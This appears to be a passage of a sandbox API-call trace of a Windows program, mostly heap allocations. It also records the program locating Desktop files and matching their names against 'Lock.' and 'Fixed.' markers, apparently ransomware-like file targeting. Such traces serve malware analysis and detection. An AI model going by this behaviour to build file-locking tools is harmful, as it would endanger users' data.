HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0100.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0100.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0100.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5c) returned 0x2a68440 [0100.209] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/EkLB 1ywsMV77uH53.wav", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\EkLB 1ywsMV77uH53.wav", lpFilePart=0x8cf650*="EkLB 1ywsMV77uH53.wav") returned 0x2d [0100.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0100.209] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\EkLB 1ywsMV77uH53.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\eklb 1ywsmv77uh53.wav")) returned 0xffffffff [0100.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75948 | out: hHeap=0x2af0000) returned 1 [0100.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0100.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0100.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0100.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0100.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0100.209] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0100.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0100.209] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0100.209] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0100.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0100.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0100.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0100.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0100.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0100.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0100.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0100.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0100.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0100.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0100.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0100.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0100.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0100.210] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ERgdUGLd4HevVs5.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0100.210] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RgdUGLd4HevVs5.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0100.210] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gdUGLd4HevVs5.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0100.210] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dUGLd4HevVs5.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0100.210] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UGLd4HevVs5.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0100.210] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GLd4HevVs5.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0100.210] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ld4HevVs5.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0100.210] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d4HevVs5.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0100.210] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4HevVs5.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0100.210] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HevVs5.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0100.210] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="evVs5.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0100.210] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vVs5.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0100.210] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vs5.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0100.210] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s5.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0100.210] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0100.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0100.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0100.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0100.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0100.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0100.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0100.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0100.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0100.211] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0100.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0100.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0100.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0100.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0100.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0100.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0100.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0100.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0100.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0100.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0100.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0100.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0100.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0100.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0100.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0100.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0100.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0100.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0100.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x28) returned 0x2a69a60 [0100.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0100.211] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ERgdUGLd4HevVs5.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0100.211] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RgdUGLd4HevVs5.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0100.211] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gdUGLd4HevVs5.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0100.211] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dUGLd4HevVs5.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0100.211] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UGLd4HevVs5.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0100.211] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GLd4HevVs5.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0100.211] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ld4HevVs5.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0100.211] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d4HevVs5.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0100.211] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4HevVs5.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0100.211] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HevVs5.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0100.212] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="evVs5.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0100.212] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vVs5.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0100.212] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vs5.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0100.212] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s5.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0100.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0100.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa64c0 [0100.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0100.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa64c0 | out: hHeap=0x2af0000) returned 1 [0100.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0100.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0100.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0100.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0100.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0100.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0100.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0100.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0100.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0100.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa61e8 | out: hHeap=0x2af0000) returned 1 [0100.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0100.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0100.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0100.212] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0100.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0100.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0100.212] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0100.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0100.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0100.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0100.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72708 [0100.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0100.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0100.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0100.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0100.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0100.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0100.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0100.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0100.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0100.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0100.213] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0100.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0100.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0100.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0100.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0100.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0100.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9058 [0100.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0100.213] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0100.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0100.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6760 [0100.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0100.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0100.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0100.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0100.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0100.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0100.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0100.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0100.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0100.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0100.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0100.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0100.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0100.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0100.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75d80 [0100.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6760 | out: hHeap=0x2af0000) returned 1 [0100.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0100.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0100.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0100.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0100.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0100.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0100.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0100.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0100.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0100.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0100.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0100.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0100.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0100.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0100.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0100.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0100.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0100.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0100.214] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0100.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0100.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0100.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0100.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0100.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0100.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0100.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0100.215] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0100.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0100.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6300 [0100.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0100.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0100.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0100.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0100.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0100.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0100.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0100.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0100.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0100.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0100.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0100.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0100.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0100.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0100.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0100.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6300 | out: hHeap=0x2af0000) returned 1 [0100.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0100.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0100.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0100.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0100.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0100.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0100.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72718 [0100.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0100.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0100.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0100.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0100.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0100.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0100.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 